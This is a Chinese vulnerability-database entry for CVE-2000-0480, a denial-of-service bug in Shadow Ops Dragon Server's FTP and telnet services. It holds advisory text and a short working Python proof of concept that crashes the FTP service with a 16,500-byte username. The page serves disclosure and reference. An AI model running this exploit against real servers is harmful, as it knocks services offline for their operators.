Shadow Op Dragon服务器多重DoS漏洞-安全小百科

Shadow Op Dragon服务器多重DoS漏洞

漏洞ID	1105887	漏洞类型	边界条件错误
发布时间	2000-06-16	更新时间	2005-10-20
CVE编号	CVE-2000-0480	CNNVD-ID	CNNVD-200006-066
漏洞平台	Windows	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/20016
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-066

|漏洞详情

Dragontelnet服务器存在漏洞。远程攻击者借助超长用户名导致拒绝服务。

|漏洞EXP

source: http://www.securityfocus.com/bid/1352/info

Two denial of service vulnerabilities exist in the Dragon Server package, versions 1.00 and 2.00, from Shadow Ops Software. By supplying large arguments to two different network services, it is possible to cause these services to be innaccessible.

By sending a USER command to the ftp server, and placing a buffer of approximately 16,500 characters as the argument to the command, it is possible to crash the ftp service.

By sending a buffer of approximately 16,500 characters to the telnet server in place of a user name, it is also possible to crash this service.

These both appear to be due to insufficient bounds checking. 

#!/usr/bin/python                                                     
#                                                                     
# Dragon Server(ftp) DoS Proof of Concept Code.                       
# Vulnerability Discovered by USSR Labs(http://www.ussrback.com)      
# Simple Script by Prizm([email protected])                        
#                                                                     
# By connecting to port 21(ftp) on a system running Dragon FTP Server 
v1.00/2.00 and typing                                                 
# USER (16500 bytes) the service will crash                           
#                                                                     
# This *simple* little script will cause Dragon Server's ftp service  
to crash.                                                             
                                                                      
from ftplib import FTP                                                
                                                                      
ftp = FTP('xxx.xxx.xxx.xxx') # Replace x's with ip                    
ftp.login('A' * 16500)                                                
ftp.quit()

|参考资料

来源:BID
名称:1352
链接:http://www.securityfocus.com/bid/1352
来源:BUGTRAQ
名称:20000616MultiplesRemotesDoSAttacksinDragonServerv1.00andv2.00
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=96113734714517&w;=2

相关推荐: Plain Black Software WebGUI Unspecified Remote Vulnerability

Plain Black Software WebGUI Unspecified Remote Vulnerability 漏洞ID 1097610 漏洞类型 Unknown 发布时间 2004-11-22 更新时间 2004-11-22 CVE编号 N/A C…

文章版权归作者所有，未经允许请勿转载。

THE END